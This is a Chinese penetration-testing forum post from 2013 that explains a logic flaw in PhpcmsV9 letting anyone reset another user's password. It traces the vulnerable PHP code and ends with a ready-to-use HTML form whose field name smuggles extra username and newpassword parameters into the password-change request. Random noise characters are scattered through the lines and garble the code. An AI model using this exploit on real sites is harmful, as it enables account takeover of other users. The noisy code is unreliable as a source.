找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 PhpcmsV9 任意用户密码修改逻辑漏洞 2013年贺岁第三发
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 1905|回复: 0
打印 上一主题 下一主题

PhpcmsV9 任意用户密码修改逻辑漏洞 2013年贺岁第三发

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-2-23 14:46:35 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
提到的通行证的代码:
& M8 N& k. ~5 a, t$ Q* ]
! x" \) u. g* S7 _% ]5 r2 ^& o
parse_str(sys_auth($_POST['data'], 'DECODE', $this->applist[$this->appid]['authkey']), $this->data);
6 p& l9 T0 P$ y. s4 N* A. ~" y; |6 O& y
在phpsso_server/phpcms/modules/phpsso/classes/phpsso.class.php中。5 A; h/ g! O; n$ x' I* v

- K- Q( P) ?* Q, k' [; G我把它留给了你们。  M* S- A( P) P- d! p: U6 B
不知道你们发现了它没有。4 M" J$ J5 n1 b/ @2 `# K8 H

# _1 V8 J0 }( X; a; C我们知道parse_str类似将http请求转换成php变量的函数,所以,也像http请求在php的环境下一样,如果提交?a=sss&a=aaa,那么a的结果会是aaa,不是sss。) ~6 }- E3 h8 ]0 e- s5 s6 b- }
- B, Z' d! C  U7 m
所以我们知道这个函数有一个问题了,如果后面提交一个内容,它会覆盖前面的。
2 H+ l* O1 `4 j+ m8 [* V2 J2 F$ }5 H# H! E; d1 x( b* x
也就是* t5 n; w) q( [8 G( k
5 M3 u' d6 \- j8 t& ^+ C2 V9 ]
username=zhangsan&username=lisi的话,那么用户名就不是zhangsan了。9 u5 F, `& Y% M( S
8 `, \  E, V- s" N8 z9 o0 w
要构造这样的请求,我们还是要回到通行证的client看看,我们有没有这样的机会。  g% v4 _8 C4 @' d

" d; B" f; M) d4 W3 O6 u/ j1 L: P+ L8 Y8 M% v
其实我们有这样的机会,看看代码,如下:+ F4 K# u1 Z8 }; G3 G6 u

  \* H& n. G& A% ]4 p! l; c; \" b( ]6 F/ w" U, G
public function auth_data($data) {! K$ R0 C4 a3 d+ F$ w* T( G( Y
                $s = $sep = '';
% Z% h1 I# ]% ~3 v0 ?0 ]. z                foreach($data as $k => $v) {
. S" H% q$ _( O( T0 [% S                        if(is_array($v)) {4 c3 T% c$ a1 z+ e' L+ g- ?8 S
                                $s2 = $sep2 = '';
& l) }0 H4 D& U( R- |                                foreach($v as $k2 => $v2) {3 E$ V* `' k. h, p6 F
                                                $s2 .= "$sep2{$k}[$k2]=".$this->_ps_stripslashes($v2);7 Q9 X4 R& h2 R1 D; S( w
                                        $sep2 = '&';2 J2 k- M5 A* O& e! U
                                }! X+ E# R2 d  [. K: B0 w
                                $s .= $sep.$s2;/ r% R6 ?* u3 K  s, E  l, L
                        } else {: I. y+ B, g* `; _4 a+ b
                                $s .= "$sep$k=".$this->_ps_stripslashes($v);
9 F6 T* ~- N( c* d3 k                        }2 L: X- F! ^# l- b
                        $sep = '&';
0 d0 O2 o5 k4 K" K" I0 A                }8 s, c; c' c( p- R* q0 E) g
8 v8 K4 _9 F: d$ B+ `
                $auth_s = 'v='.$this->ps_vsersion.'&appid='.APPID.'&data='.urlencode($this->sys_auth($s));
& \+ @$ V% Y7 z6 Y3 S. _4 [. r                return $auth_s;& m/ c: h- n  D0 @5 ^
        }% X8 S! a1 c- }0 g

7 S, J8 z# ]9 A/ ^, \, R- G8 b. v可能我没说明白,对,传递进来的数组的key是可控的。如果我的key里包含[]&这样三个字符的话,那么我就能重写这样的东西。; Q3 k, X6 f6 h, w. i" a- O

/ o/ c* Y! F. E; j3 @举个例子; q$ B4 K1 x) L# P

7 {5 r2 Z1 v8 H, H) m$a[aaa=a&bbb] = 'a';
% g6 X) U& ]- t. D  f& T: H& N. C& h6 k+ M! v. ~2 M
会变成aaa=a&bbb=a
& b0 d: S8 ]  H. K/ V
) r* N( c) I2 g9 S+ m2 l3 K" Z$ A0 g明白了么,对,就是通过没有注意到的key,我们可以构造出多余的参数来。
6 w. ^  Q, N3 _' a2 y5 G9 y- @( [' [2 F4 O( C9 O; @
这个时候,我们可以再去看一个函数。, _$ b  r' h: U4 {) {% f
' C) T) I$ c, }
就在这个文件内:
' n; o7 Z# W7 o7 x& U
5 f7 R2 C7 E) a, e( s8 N& ^) m9 G7 J( C) z* w; y, I
public function ps_member_edit($username, $email, $password='', $newpassword='', $uid='', $random='') {
( h, Q& H9 n1 c1 O+ v, f7 k                if($email && !$this->_is_email($email)) {" Z) b9 s8 w9 a# B. Y) q
                        return -4;6 n' I- X6 {9 v  H3 Z
                }
7 m. _8 C# _2 W, A" u9 ~* r6 s                return $this->_ps_send('edit', array('username'=>$username, 'password'=>$password, 'newpassword'=>$newpassword, 'email'=>$email, 'uid'=>$uid, 'random'=>$random));7 @  O4 {, ~' K) e2 \
        }" H) d5 |* |! N% T2 b
8 q% L' L. B4 d0 `* m- [3 @  O1 v
这是向通行证发了这样一个请求。
; r$ e) e% q7 d0 R
. z) @" M2 \5 x4 O' U0 ^我们再跟到通信证代码里去看看,就会有所发现。
: L0 Z: I* i8 l7 A7 V
) ?+ v( i% V8 f8 u, ~1 |
7 ]2 B$ S8 b  A2 G" D. t! Lpublic function edit() {* h0 R' Q( S/ [; S. k1 D
//能省就省,太长了不是吗?7 I+ ^( v3 K, L- c. _
1 d3 R' ~3 b( x' p( u; y
if($this->username) {
% {  y5 q. ]6 h' P. N//如果提交了用户名,则按照用户名修改记录,反之,按照uid来修改记录。
1 F) a0 l1 i5 Q" _                                $res = $this->db->update($data, array('username'=>$this->username));
3 G, h! I/ u' `3 z- h' J* u0 G9 L                        } else {
1 {# p# P7 s+ ^+ L; w                                file_put_contents('typeb.txt',print_r($data,1).$this->uid);
: O) [/ _# u* ^+ u# ^' s$ O$ k                                $res = $this->db->update($data, array('uid'=>$this->uid));7 }# Y+ L% T3 c# @9 v- k1 ~' ~
                        }
; Z) C0 n- E0 W+ N6 C0 q8 U3 M6 R" h# l# x, j
好,我们知道了,如果提交了用户名,就会按照用户名来修改记录,不然就按照uid,我们看看函数结构:1 B2 x, d8 x2 p! m$ d% O
1 ]9 Z- H5 M8 T* \; J6 I
public function ps_member_edit($username, $email, $password='', $newpassword='', $uid='', $random='')
, z3 h+ Y3 h) u% i3 z7 u1 h2 E9 g) w* R) ]! U8 G
很好,uid要是无法控制的话,后面只剩下一个random了,但是username就在第一个,只要email,password,newpassword,有任何一个可以控制,就可以修改密码了。
8 z  Z- ]# w. E4 u0 F" e* G4 O& M, R1 j8 }2 K7 `) F* ~- ?
我当然找到了:8 |( N# `- \8 T! ]
phpcms9/phpcms/modules/member/index.php
/ U1 s, F" `( Z& i( P
$ S3 y+ e/ Q) I( O$res = $this->client->ps_member_edit('', $email, $_POST['info']['password'], $_POST['info']['newpassword'], $this->memberinfo['phpssouid'], $this->memberinfo['encrypt']);
4 }% `7 i* {& z% f9 M* `7 ?
) H6 n6 v( G# A" [* p然后就没有然后了。1 ~+ E8 w: M3 y# [- s; k1 W6 n' _
6 q- x. n4 }$ J9 o; |9 `
<form method="post" action="http://localhost/phpcms9/index.php?m=member&c=index&a=account_manage_password&t=1" id="myform" name="myform">
- `" W; t& z+ s) f3 {                                <table width="100%" cellspacing="0" class="table_form">
& B0 d. C5 B- B! A* r6 t) c                                        <tr>
! C% U' w9 W3 ^3 s* Y                                                <th width="80">邮箱:</th>        , X3 K! b9 j/ h1 v$ m9 h) _8 C% I
                                                <td><input name="info[email]" type="text" id="email" size="30" value="jj@jj.com" class="input-text"></td>
, ~; \( U1 e7 e+ _% X                                        </tr>1 c: W. M2 {; b: `
                                        <tr>
' ?' D" W3 k) y( W$ a$ o8 C                                                <th width="80">原密码:</th>        
  ?+ @, e* g2 n8 `$ y/ M5 N                                                <td><input name="info[password]" type="password" id="password" size="30" value="111111" class="input-text"></td>6 X; Q& j# R+ Y# O9 q
                                        </tr>
6 e8 a  j3 z/ j* [, B0 n9 o                                        <tr>6 g: s$ c; h; J: K4 ~. J
                                                <th>新密码:</th>- o' s/ t" L( y6 m, M# m
                                                <td><input name="info[newpassword][%5D=aaa%5D%5B&username=cc&newpassword=aaaaaa&]" type="password" id="newpassword" size="30" value="" class="input-text"></td>! C% O( z4 z3 d9 ]! p1 K
                                        </tr># J. F2 z0 n# p  b" A; `5 h8 {
                                        <th></th>0 q( G) S4 A( [, c
                                        <td><input name="dosubmit" type="submit" id="dosubmit" value="提交" class="button"></td>
. j8 O" i0 f  i8 R! m                                        </tr>" y: a9 t/ I2 H+ G/ V$ |
                                </table>. A1 ]9 [5 X# D5 @/ r- Q

; L& d4 E3 I1 u+ }% l5 o/ r                                ( |6 L9 _0 K- |( L
                        </form>
8 \. r- [+ H7 W; _/ Z
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表